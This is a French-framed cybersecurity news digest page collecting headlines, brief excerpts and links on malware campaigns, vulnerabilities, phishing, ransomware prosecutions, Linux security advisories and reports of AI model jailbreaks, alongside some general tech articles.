L'Actu de la presse spécialisée

New MassJacker clipper targets pirated software seekers
Pirated software seekers are targeted by the new MassJacker clipper malware, according to CyberArk researchers. A new malware campaign spreading a new clipper malware dubbed MassJacker targets users searching for pirated software, Cyberark users warn. A clipper malware is a type of malicious software designed to intercept and manipulate clipboard data, typically for cryptocurrency theft. […]
https://securityaffairs.com/175433/malware/new-massjacker-clipper-targets-pirated-software-seekers.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hackers Attacking Exposed Jupyter Notebooks To Deliver Cryptominer
A novel cryptomining campaign has been identified that exploits misconfigured Jupyter Notebooks, targeting both Windows and Linux systems. The attack leverages exposed instances of Jupyter Notebook, an interactive application widely used by data scientists containing a Python IDE, to deploy malicious code that installs cryptomining software on compromised systems. The campaign begins by exploiting unsecured […] The post Hackers Attacking Exposed Jupyter Notebooks To Deliver Cryptominer appeared first on Cyber Security News.
https://cybersecuritynews.com/hackers-attacking-exposed-jupyter-notebooks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cybersecurity in Crypto: Best Practices to Prevent Theft and Fraud
Cybersecurity tips to protect your cryptocurrency from hackers, scams, and fraud. Learn best practices for securing digital assets…
https://hackread.com/cybersecurity-crypto-practices-to-prevent-theft-fraud/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Artificial Intelligence Optimization (AIO): The Next Frontier in SEO
Artificial Intelligence Optimization (AIO) is one of the newest developments in search engine optimization. AIO combines AI technologies with traditional SEO techniques which improves the processes. Adopting AI SEO techniques and automation increases the accuracy of reaching the target audience and increases user engagement.
https://hackernoon.com/artificial-intelligence-optimization-aio-the-next-frontier-in-seo?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AWS SNS Abused To Exfiltrate Data & Phishing Attack
Amazon Web Services Simple Notification Service (AWS SNS) has emerged as a new vector for malicious actors to exfiltrate sensitive data and conduct phishing campaigns. This pub/sub messaging service, designed to enable application-to-person and application-to-application communications, is increasingly being exploited by attackers seeking to bypass traditional security controls and network monitoring. The attacks leverage legitimate […] The post AWS SNS Abused To Exfiltrate Data & Phishing Attack appeared first on Cyber Security News.
https://cybersecuritynews.com/aws-sns-abused/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Future of Healthcare: How It Can Be Used to Save a Few Billion Lives
A lot of the diagnosis process sometimes feels like guesswork to me. Doctors have to rely on a patient's ability to accurately describe what they're going through. If a doctor has never dealt with a particular illness before, their chances of diagnosing it early in a patient are quite [low]
https://hackernoon.com/the-future-of-healthcare-how-it-can-be-used-to-save-a-few-billion-lives?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DeepSeek R1 Jailbreaked To Develop Malware, Such As A Keylogger And Ransomware
Cybersecurity researchers have discovered that DeepSeek R1, an open-source large language model, can be manipulated to create functioning malware despite built-in safeguards. The AI model, designed with reasoning capabilities, initially refuses to generate malicious code but can be circumvented through specific prompting techniques. This discovery raises significant concerns about the potential misuse of freely accessible […] The post DeepSeek R1 Jailbreaked To Develop Malware, Such As A Keylogger And Ransomware appeared first on Cyber Security News.
https://cybersecuritynews.com/deepseek-r1-jailbreaked/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

OTel Me Why: Why I'm So Excited About OTel
Someone asked me why I was so excited about OpenTelemetry. The reasons have more to do with it's innovation and utility than it's novelty.
https://hackernoon.com/otel-me-why-why-im-so-excited-about-otel?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Navigating the Murky Waters of AI and Copyright Law
The ongoing debate about the authorship and ownership of generative content is intense. There are two sides to the AI copyright debate. One contends generative models' work is transformative since they can learn to produce new content. The other argues they are using intellectual property without permission.
https://hackernoon.com/navigating-the-murky-waters-of-ai-and-copyright-law?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Ghostgpt Is Empowering Cybercrime in The Age Of AI
Artificial Intelligence (AI) has significantly transformed various sectors, offering tools that enhance efficiency and innovation. However, the emergence of uncensored AI chatbots like GhostGPT has introduced new challenges in cybersecurity.... The post How Ghostgpt Is Empowering Cybercrime in The Age Of AI appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/how-ghostgpt-is-empowering-cybercrime-in-the-age-of-ai/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AI Won't Replace Me Yet, But It Might Prove I Was Never That Original
AI won't replace me yet. But what if it proves I was never that original? This essay explores how large language models don't just mimic human writing but reveal how formulaic, predictive, and machine-like most human output has always been. From genre fiction to LinkedIn “Accordion of Wisdom” posts, much of what we call creativity might just be pattern recognition. The real existential crisis? AI isn't making writing soulless—it's exposing the soullessness that was already there.
https://hackernoon.com/ai-wont-replace-me-yet-but-it-might-prove-i-was-never-that-original?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Building a Bitcoin Wallet from Scratch: Two Months of Solo Development Insights
Nummus will be a custodial wallet that offers a BTC-backed credit card, collateralized loans, and secure custody. The main goal is to ship a clean, functional Bitcoin wallet that demonstrates my ability to deliver, grow, and scale a product to users and potential investors.
https://hackernoon.com/building-a-bitcoin-wallet-from-scratch-two-months-of-solo-development-insights?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cisco IOS XR flaw allows attackers to crash BGP process on routers
Cisco addressed a denial of service (DoS) vulnerability that allows attackers to crash the Border Gateway Protocol (BGP) process on IOS XR routers. Cisco has addressed a denial of service (DoS) vulnerability, tracked as CVE-2025-20115, that could allow an unauthenticated, remote attacker to crash the Border Gateway Protocol (BGP) process on IOS XR routers by sending a single BGP […]
https://securityaffairs.com/175421/security/cisco-ios-xr-flaw-cve-2025-20115.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Like Kermit Once Said: “It's Not Easy Being Green” - AI Environmental Equity
A few months ago, I spoke with Shaolei Ren, as associate professor of computer science at University of California, Riverside, and his team about their research into the secret water footprint of AI.
https://hackernoon.com/like-kermit-once-said-its-not-easy-being-green-ai-environmental-equity?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Top Cybersecurity Tools of 2025 To Managing Remote Device Threats
The rise of remote work has significantly increased the attack surface for cybercriminals, making robust cybersecurity tools more critical than ever. As organizations adapt to a world where employees operate from diverse locations, cyber threats targeting remote devices continue to evolve.  In 2025, advanced security solutions will help businesses safeguard sensitive data, ensure compliance, and […] The post Top Cybersecurity Tools of 2025 To Managing Remote Device Threats appeared first on Cyber Security News.
https://cybersecuritynews.com/top-cybersecurity-tools-managing-remote-device-threats/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AutoResponder AI: The Smart Way to Manage Your Gmail Inbox
AutoResponder AI is an AI-powered email assistant that can help you save time and prevent your inbox from overflowing. It checks all your unread emails in Gmail, understands their sentiment, writes the replies for the ones that need a reply and saves them as drafts for you to finalize. When the drafts are ready, it will send you a notification by email or SMS so you are always updated.
https://hackernoon.com/autoresponder-ai-the-smart-way-to-manage-your-gmail-inbox?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Linear Attention and Long Context Models
Linear Attention variants optimize autoregressive modeling with kernel approximations and efficient normalization. Long-context models promise scalability, but few prove performance gains—Selective SSMs aim to bridge the gap.
https://hackernoon.com/linear-attention-and-long-context-models?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

State Space Models vs RNNs: The Evolution of Sequence Modeling
SSMs integrate selection mechanisms and state expansion to outperform traditional RNNs in sequence modeling. Models like H3, RetNet, and RWKV refine AI efficiency for long-context data, surpassing RNN limitations.
https://hackernoon.com/state-space-models-vs-rnns-the-evolution-of-sequence-modeling?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How AI Chooses What Information Matters Most
Selection mechanisms refine AI's approach to gating and hypernetworks, enabling structured state space models (SSMs) to handle long-context tasks more efficiently. Mamba leverages this innovation to outperform traditional models in sequence learning.
https://hackernoon.com/how-ai-chooses-what-information-matters-most?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The TechBeat: Is the U.S. Secretly Accumulating Bitcoin? (3/15/2025)
How are you, hacker? 🪐Want to know what's trending right now?: The Techbeat by HackerNoon has got you covered with fresh content from our trending stories of the day! Set email preference here. ## What the Hell Is the Mar-a-Lago Accord and Why Should You Care? By @darragh [ 8 Min read ] Explore Trump's bold Mar‑a‑Lago Accord—a daring plan using century bonds, currency moves, and digital assets to reshape America's economy. Read More. Can AI Really Code? I Put DeepSeek to the Test By @filestack [ 7 Min read ] I remember the day I first started experimenting with DeepSeek for coding. It felt like stepping into a new dimension where code could almost write itself. Read More. What Is a Diffusion LLM and Why Does It Matter? By @zbruceli [ 5 Min read ] What is diffusion...
https://hackernoon.com/3-15-2025-techbeat?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to choose the Correct Severity or CVSS Score for a Bug: A Practical Guide
In the world of bug bounty hunting, one of the most critical aspects of submitting a report is accurately determining the severity or CVSS (Common Vulnerability Scoring System) score of the vulnerability. This helps the development team understand the urgency of the issue and prioritize it accordingly. Choosing the correct severity level not only reflects your understanding of the bug's impact but also affects how seriously your report is taken.Understanding Severity and CVSS ScoresSeverity ratings typically fall into four categories: Low, Medium, High, and Critical. These categories help teams prioritize the remediation efforts based on the potential impact and risk associated with the vulnerability. However, these labels can sometimes oversimplify the issue, which is where the CVSS framework...
https://infosecwriteups.com/how-to-choose-the-correct-severity-or-cvss-score-for-a-bug-a-practical-guide-7a83be0096f3?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Network Intrusion Analysis at Scale
Azure, Databricks, and PySparkPhoto by Thomas Jensen on UnsplashIntroductionA major problem when cyber security experts are trying to develop new machine-learning-based tools and techniques, is a lack of high-quality training sets. To address this, the Canadian Institute for Cybersecurity (CIC) has created and released a number of datasets over the last several years in this area.In this blog post, we'll take a look at one of their datasets, some of the issues that have been found with it, and then we'll upload a corrected version of this data into cloud storage and ultimately into a Python notebook. Specifically, we'll mainly use PySpark, which is an API for using Apache Spark on Databricks, allowing processing of large-scale, distributed data.One such dataset is the CSE-CIC-IDS2018,...
https://infosecwriteups.com/network-intrusion-analysis-at-scale-733169fc29ff?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Website that will be helpful in your Bug bounty and OSINT journey
It is a very helpful site for bug hunters and OSINT investigators.Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/a-website-that-will-be-helpful-in-your-bug-bounty-and-osint-journey-2c3368346924?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ubuntu Server 22.04 LTS Installation — Step by Step Guide
Hello, my digital adventurers! Today, I am going to show you how to install Ubuntu Server 22.04 LTS.Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/ubuntu-server-22-04-lts-installation-step-by-step-guide-2e57df92095c?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

EXIF Geolocation Data: The Overlooked Risk in Uploaded Images
Introduction: A Simple Bug with Hidden RisksContinue reading on InfoSec Write-ups »
https://infosecwriteups.com/exif-geolocation-data-the-overlooked-risk-in-uploaded-images-4e9af1858772?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Powerful Linux Tricks That Will Change Your Life
If you’ve ever worked in a Linux environment, you know how powerful and versatile it can be. But let’s be honest, at first glance the…Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/powerful-linux-tricks-that-will-change-your-life-bb515d560bcf?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fedora 40: chromium 2025-8fdc09e745 Security Advisory Updates
Update to 134.0.6998.88 High CVE-2025-1920: Type Confusion in V8 High CVE-2025-2135: Type Confusion in V8 Medium CVE-2025-2136: Use after free in Inspector Medium CVE-2025-2137: Out of bounds read in V8
https://linuxsecurity.com/advisories/fedora/fedora-40-chromium-2025-8fdc09e745-security-advisory-updates-dnb8cmibk8bw
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fedora 40: xen 2025-20bd6d94b9 Security Advisory Updates
deadlock potential with VT-d and legacy PCI device pass-through [XSA-467, CVE-2025-1713]
https://linuxsecurity.com/advisories/fedora/fedora-40-xen-2025-20bd6d94b9-security-advisory-updates-4hzs1atdlc2q
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fedora 41: linux-firmware 2025-7f56eb37a0 Security Advisory Updates
Update to upstream 20250311: amdgpu: many firmware updates qcom: Update gpu firmwares for qcs8300 chipset add firmware for qat_420xx devices amdgpu: DMCUB updates for various ASICs
https://linuxsecurity.com/advisories/fedora/fedora-41-linux-firmware-2025-7f56eb37a0-security-advisory-updates-dtw762njxppu
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fedora 41: chromium 2025-d5935f40af Security Advisory Updates
Update to 134.0.6998.88 High CVE-2025-1920: Type Confusion in V8 High CVE-2025-2135: Type Confusion in V8 Medium CVE-2025-2136: Use after free in Inspector Medium CVE-2025-2137: Out of bounds read in V8
https://linuxsecurity.com/advisories/fedora/fedora-41-chromium-2025-d5935f40af-security-advisory-updates-n2rqdorpmsbd
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Mageia 2025-0098: ghostscript Security Advisory Updates
This release addresses CVEs: CVE-2025-27835, CVE-2025-27832, CVE-2025-27831, CVE-2025-27836, CVE-2025-27830, CVE-2025-27833, CVE-2025-27837, CVE-2025-27834 The 10.05.0 release deprecates the non-standard operator "selectdevice", all code should now be using the standard "setpagedevice" operator.
https://linuxsecurity.com/advisories/mageia/mageia-2025-0098-ghostscript-security-advisory-updates-jn0apv30xjgz
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Mageia 2025-0097: man2html man2html Security Advisory Updates
In man2html 1.6g, a specific string being read in from a file will overwrite the size parameter in the top chunk of the heap. This at least causes the program to segmentation abort if the heap size parameter isn't aligned correctly. In versions before GLIBC version 2.29 and if aligned correctly, it allows arbitrary writes anywhere in the program's
https://linuxsecurity.com/advisories/mageia/mageia-2025-0097-man2html-man2html-security-advisory-updates-veow3t9ru337
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

L'Actu de la presse

Seco head Budliger Artieda officially travels to the USA | blue News - Bluewin
... Cyber attack. EC payment not possible in Spar branches. Cyber attackEC payment not possible in Spar branches. About blue. Our Company · Work at blue ...
https://www.bluewin.ch/en/news/seco-head-budliger-artieda-officially-travels-to-the-usa-2606408.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Apple warns billions of iPhone users to update immediately or risk 'extremely sophisticated attack'
Speaking about this Apple also said the latest zero-day vulnerability was likely used in a cyber-attack on 'specific targeted individuals,' using ...
https://www.unilad.com/technology/apple-warns-iphone-users-update-risk-attack-141670-20250315
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

EC payment at Spar branches not possible due to cyber attack | blue News - Bluewin
The wholesaler Spar and its TopCC stores have fallen victim to a cyber attack. The systems were extensively affected: IT systems and EC devices ...
https://www.bluewin.ch/en/news/ec-payment-at-spar-branches-not-possible-due-to-cyber-attack-2606427.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Raymond Ltd Confirms Cyber-Attack On IT Infrastructure, Assures No Disruptions To Retail ...
Leading textile and apparel conglomerate Raymond Limited confirmed a cyber-attack on its IT infrastructure last month.
https://www.freepressjournal.in/business/raymond-ltd-confirms-cyber-attack-on-it-infrastructure-assures-no-disruptions-to-retail-operations
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Badlapur Accident: Four Teenagers Drown In Ulhas River While Washing Off Holi Colours
The victims were sent to the Primary Health Center in Badlapur for post-mortem examination. FPJ Shorts. Raymond Ltd Confirms ...
https://www.freepressjournal.in/mumbai/badlapur-accident-four-teenagers-drown-in-ulhas-river-while-washing-off-holi-colours
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Putin could turn off the taps to our cash - Yahoo
Artificial intelligence has allowed hackers to increase the number and sophistication of their attacks. A worst-case scenario cyber attack would be ...
https://www.yahoo.com/news/putin-could-turn-off-taps-130000032.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Putin could turn off the taps to our cash - The Telegraph
Yet Professor Woodward sees these problems as indicative of weaknesses of banks to cyber attack. “These outages are typically caused by someone ...
https://www.telegraph.co.uk/money/banking/how-putin-shut-off-britain-bank-accounts/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Infosys settles six class-action lawsuits against US subsidiary for .5 million - Upstox
The six class-action lawsuits pertain to a cyber attack, dating November 3, 2023, on IMS systems, which resulted in the “non-availability of certain ...
https://upstox.com/news/market-news/stocks/infosys-settles-six-class-action-lawsuits-against-us-subsidiary-for-17-5-million/article-152776/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Tata Technologies Suffers Ransomware Attack, Sensitive Data Leaked on Dark Web
... Cyber Attack on X Platform – What It Means for the Future of Digital Security. March 12, 2025. WSO2 Debuts AI-Driven Automation for Identity and ...
https://www.itvoice.in/tata-technologies-suffers-ransomware-attack-sensitive-data-leaked-on-dark-web
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Launching counter attack, Kerala CPM leader G Sudhakaran says 'cyber warriors' are not ...
Alappuzha: Unfazed over the cyber attack against him by party supporters, Senior CPM leader G. Sudhakaran has dismissed the criticism against him ...
https://english.mathrubhumi.com/news/kerala/senior-cpm-leader-g-sudhakaran-criticises-cyber-attack-against-him-by-cyber-warriors-of-cpm-1.10425719
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Starship, carrying Teslas bot, set for Mars by end 2026, says Elon Musk - LBCI Lebanon
Musk says X hit with 'massive cyber-attack'. 0. LBCI. World News. 2025-03-10. Musk says X hit with 'massive ...
https://www.lbcgroup.tv/news/varietytech/843425/starship-carrying-teslas-bot-set-for-mars-by-end-2026-says-elon-musk/en
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Anne Arundel County makes progress in recovery efforts after cyber incident - YouTube
... 537K views · 4:16 · Go to channel · Anne Arundel County Executive Steuart Pittman talks cyber attack. WBFF FOX45 Baltimore New 311 views · 3:44:42.
https://www.youtube.com/watch%3Fv%3DiYr3CttlBlU
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Soutenez No Hack Me sur Tipeee

L'Actu de la veille (Presse spécialisée)

Coinbase phishing email tricks users with fake wallet migration
A large-scale Coinbase phishing attack poses as a mandatory wallet migration, tricking recipients into setting up a new wallet with a pre-generated recovery phrase controlled by attackers. [...]
https://www.bleepingcomputer.com/news/security/coinbase-phishing-email-tricks-users-with-fake-wallet-migration/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClickFix: How to Infect Your PC in Three Easy Steps
A clever malware deployment scheme first spotted in targeted attacks last year has now gone mainstream. In this scam, dubbed "ClickFix," the visitor to a hacked or malicious website is asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware.
https://krebsonsecurity.com/2025/03/clickfix-how-to-infect-your-pc-in-three-easy-steps/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Threat Actor Impersonates Booking.com in Phishing Scheme
Microsoft detailed a sophisticated campaign that relies on a social engineering technique, "ClickFix," in which a phisher uses security verification like captcha to give the target a false sense of safety.
https://www.darkreading.com/threat-intelligence/threat-actor-booking-com-clickfix-phishing-scheme
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Man-in-the-Middle Vulns Provide New Research Opportunities for Car Security
A pair of researchers plan on detailing effective tools to dig into the effectiveness of vehicle cybersecurity without breaking the bank.
https://www.darkreading.com/cybersecurity-operations/mitm-vulns-research-opportunities-car-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ransomware Developer Extradited, Admits Working for LockBit
Law enforcement discovered admin credentials on the suspect's computer for an online repository hosted on the Dark Web that stored source code for multiple versions of the LockBit builder.
https://www.darkreading.com/cyberattacks-data-breaches/lockbit-developer-extradited-admits-working-ransomware-group
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Metasploit Weekly Wrap-Up 03/14/25
This Metasploit Weekly Wrap-Up saw a deserialization module for CVE-2024-55556, exploiting unauthenticated PHP deserialization vulnerability in InvoiceShelf.
https://blog.rapid7.com/2025/03/14/metasploit-weekly-wrap-up-03-14-25/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Week-long Exchange Online outage causes email failures, delays
Microsoft says it partially mitigated a week-long Exchange Online outage causing delays or failures when sending or receiving email messages. [...]
https://www.bleepingcomputer.com/news/microsoft/week-long-exchange-online-outage-causes-email-failures-delays/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Symantec Demonstrates OpenAI's Operator Agent in PoC Phishing Attack
Symantec demonstrates OpenAI's Operator Agent in PoC phishing attack, highlighting AI security risks and the need for proper cybersecurity.
https://hackread.com/symantec-openai-operator-agent-poc-phishing-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Threat Actor Tied to LockBit Ransomware Targets Fortinet Users
The Mora_001 group uses similar post-exploitation patterns and ransomware customization originated by LockBit.
https://www.darkreading.com/cyberattacks-data-breaches/actor-tied-lockbit-ransomware-targets-fortinet-users
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Context Compliance Attack Jailbreaks Most of The Major AI Models
A new, surprisingly simple method called Context Compliance Attack (CCA) has proven effective at bypassing safety guardrails in most leading AI systems. Unlike complex prompt engineering techniques that attempt to confuse AI systems with intricate word combinations, CCA exploits a fundamental architectural weakness present in many deployed models. The method works by manipulating conversation history […] The post New Context Compliance Attack Jailbreaks Most of The Major AI Models appeared first on Cyber Security News.
https://cybersecuritynews.com/new-context-compliance-attack-jailbreaks-ai-models/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ransomware gang creates tool to automate VPN brute-force attacks
The Black Basta ransomware operation created an automated brute-forcing framework dubbed 'BRUTED' to breach edge networking devices like firewalls and VPNs. [...]
https://www.bleepingcomputer.com/news/security/black-basta-ransomware-creates-automated-tool-to-brute-force-vpns/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cisco IOS XR vulnerability lets attackers crash BGP on routers
Cisco has patched a denial of service (DoS) vulnerability that lets attackers crash the Border Gateway Protocol (BGP) process on IOS XR routers with a single BGP update message. [...]
https://www.bleepingcomputer.com/news/security/cisco-vulnerability-lets-attackers-crash-bgp-on-ios-xr-routers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hackers Exploiting Exposed Jupyter Notebooks to Deploy Cryptominers
Cado Security Labs has identified a sophisticated cryptomining campaign exploiting misconfigured Jupyter Notebooks, targeting both Windows and Linux systems. The attack utilizes multiple stages of obfuscation, including encrypted payloads and COM object manipulation, to ultimately deploy miners for various cryptocurrencies including Monero, Ravencoin, and several others. This previously unreported exploitation method demonstrates how threat actors […] The post Hackers Exploiting Exposed Jupyter Notebooks to Deploy Cryptominers appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/hackers-exploiting-exposed-jupyter-notebooks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Black Basta Ransomware Attack Edge Network Devices With Automated Brute Force Attacks
A Russian-speaking actor using the Telegram handle @ExploitWhispers leaked internal chat logs of Black Basta Ransomware-as-a-Service (RaaS) members on February 11, 2025. These communications, spanning from September 2023 to September 2024, have provided security researchers with unprecedented insight into the group’s operational tactics and infrastructure used to target organizations across multiple sectors. Black Basta, which […] The post Black Basta Ransomware Attack Edge Network Devices With Automated Brute Force Attacks appeared first on Cyber Security News.
https://cybersecuritynews.com/black-basta-ransomware-attack-edge-network-devices/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Research on iOS apps shows widespread exposure of secrets
A shocking amount of iOS apps in Apple's App Store contained hard-coded secrets. Secrets that could lead criminals to user data.
https://www.malwarebytes.com/blog/news/2025/03/research-on-ios-apps-shows-widespread-exposure-of-secrets
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AWS SNS Exploited for Data Exfiltration and Phishing Attacks
Amazon Web Services’ Simple Notification Service (AWS SNS) is a versatile cloud-based pub/sub service that facilitates communication between applications and users. While its scalability and integration capabilities make it a powerful tool for organizations, its misuse by adversaries for malicious purposes such as data exfiltration and phishing has raised significant security concerns. This article delves […] The post AWS SNS Exploited for Data Exfiltration and Phishing Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/aws-sns-exploited-for-data-exfiltration/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Best WordPress Plugins for Cybersecurity 2025
WordPress is a great platform for building websites, but it is also a common target for hackers. Keeping your website safe is important to protect your data, visitors, and business. Cybercrime is a growing problem, with 39% of UK businesses experiencing cyber attacks in 2023. Using security plugins can help reduce risks and keep your […] The post Best WordPress Plugins for Cybersecurity 2025 appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/14/best-wordpress-plugins-for-cybersecurity/?utm_source=rss&utm_medium=rss&utm_campaign=best-wordpress-plugins-for-cybersecurity
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CISA Cuts M in ISAC Funding & 100s of Employees
President Trump has long complained about perceived threats to election security. Now his DHS has kneecapped the agencies designed to support it. Experts are worried about what comes next.
https://www.darkreading.com/remote-workforce/cisa-cuts-isac-funding-employees
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hackers Allegedly Selling 3.17 Million Records of Honda Cars India Customers
A hacker operating under the pseudonym “Empire” has allegedly listed a database containing 3,176,958 records from Honda Cars India Ltd for sale on a notorious cybercrime forum. The leaked data reportedly includes sensitive customer information such as names, aliases, addresses, customer IDs, and contact details like mobile numbers and email addresses. The breach is claimed […] The post Hackers Allegedly Selling 3.17 Million Records of Honda Cars India Customers appeared first on Cyber Security News.
https://cybersecuritynews.com/hackers-allegedly-selling-honda-cars-data/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

LockBit ransomware developer Rostislav Panev was extradited from Israel to the U.S.
The US Justice Department announced that the LockBit ransomware developer Rostislav Panev was extradited from Israel to the U.S. The US Justice Department announced that one of the LockBit ransomware developer, Rostislav Panev (51), has been extradited to the United States. The dual Russian-Israeli national was arrested in Israel in 2024 and faces charges related […]
https://securityaffairs.com/175413/cyber-crime/lockbit-ransomware-developer-rostislav-panev-extradited-to-us.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Suspected LockBit ransomware dev extradited to United States
A dual Russian-Israeli national, suspected of being a key developer for the LockBit ransomware operation, has been extradited to the United States to face charges. [...]
https://www.bleepingcomputer.com/news/security/suspected-lockbit-ransomware-dev-extradited-to-united-states/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Biggest Cyber Threats to the Healthcare Industry Today
Healthcare organizations must enhance their cybersecurity arsenal. Doing so can help them prevent financial, compliance, and reputational damage.
https://www.darkreading.com/vulnerabilities-threats/biggest-cyber-threats-healthcare-industry-today
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Microsoft 365 Phishing Scam Tricks Users Into Calling Fake Support
New Microsoft 365 phishing scam exploits fake support numbers to steal credentials. Learn how attackers bypass security and how to stay protected.
https://hackread.com/new-microsoft-365-phishing-scam-calling-fake-support/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Cyber Insurance Conundrum
While cybercriminals innovate at lightning speed, cybersecurity teams—led by Chief Information Security Officers (CISOs)—often find themselves relying on outdated playbooks. Cyber insurance, once viewed as the ultimate safety net, is... The post The Cyber Insurance Conundrum appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/the-cyber-insurance-conundrum/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Unlocking MSSP Success: Why CTEM is Critical
Discover why Continuous Threat Exposure Management (CTEM) is a game-changer for MSSPs. Learn how a proactive, risk-based security approach helps service providers stand out, reduce exposure, and deliver measurable security improvements.
https://blog.rapid7.com/2025/03/14/unlocking-mssp-success-why-ctem-is-critical/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Remote Access Infra Remains Riskiest Corp. Attack Surface
Exposed login panels for VPNs and remote access systems leave companies open to attack, sometimes tripling the risk of ransomware and making it harder to get cyber insurance.
https://www.darkreading.com/cyber-risk/remote-access-infra-remains-riskiest-corp-attack-surface
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CrowdStrike Deep Dives Into DeepSeek And The Risk Of Foreign LLMs
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Mar. 14, 2025 – Watch the full YouTube Video The Cybercrime Magazine YouTube channel has released the inaugural episode of CrowdStrike’s new Adversary Universe Podcast. The hosts of the first episode, Adam Meyers, CrowdStrike's Head of The post CrowdStrike Deep Dives Into DeepSeek And The Risk Of Foreign LLMs appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/crowdstrike-deep-dives-into-deepseek-and-the-risk-of-foreign-llms/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Edimax Camera RCE Vulnerability Exploited to Spread Mirai Malware
A recent alert from the Akamai Security Intelligence and Response Team (SIRT) has highlighted the exploitation of a severe command injection vulnerability in Edimax Internet of Things (IoT) devices. This vulnerability, designated as CVE-2025-1316, has been actively used by multiple botnets to spread Mirai malware. Mirai is notorious for compromising IoT devices and orchestrating distributed […] The post Edimax Camera RCE Vulnerability Exploited to Spread Mirai Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/edimax-camera-rce-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Application security trends: Shift-left security, AI, and open source malware
Software is at the heart of business operations across most industries, which means application security has never been more critical. However, as organizations embrace cloud-native architectures, microservices, and open source components, the attack surface continues to expand. The result: an ever-growing number of vulnerable and malicious dependencies that adversaries are eager to exploit.
https://www.sonatype.com/blog/application-security-trends-shift-left-security-ai-and-open-source-malware
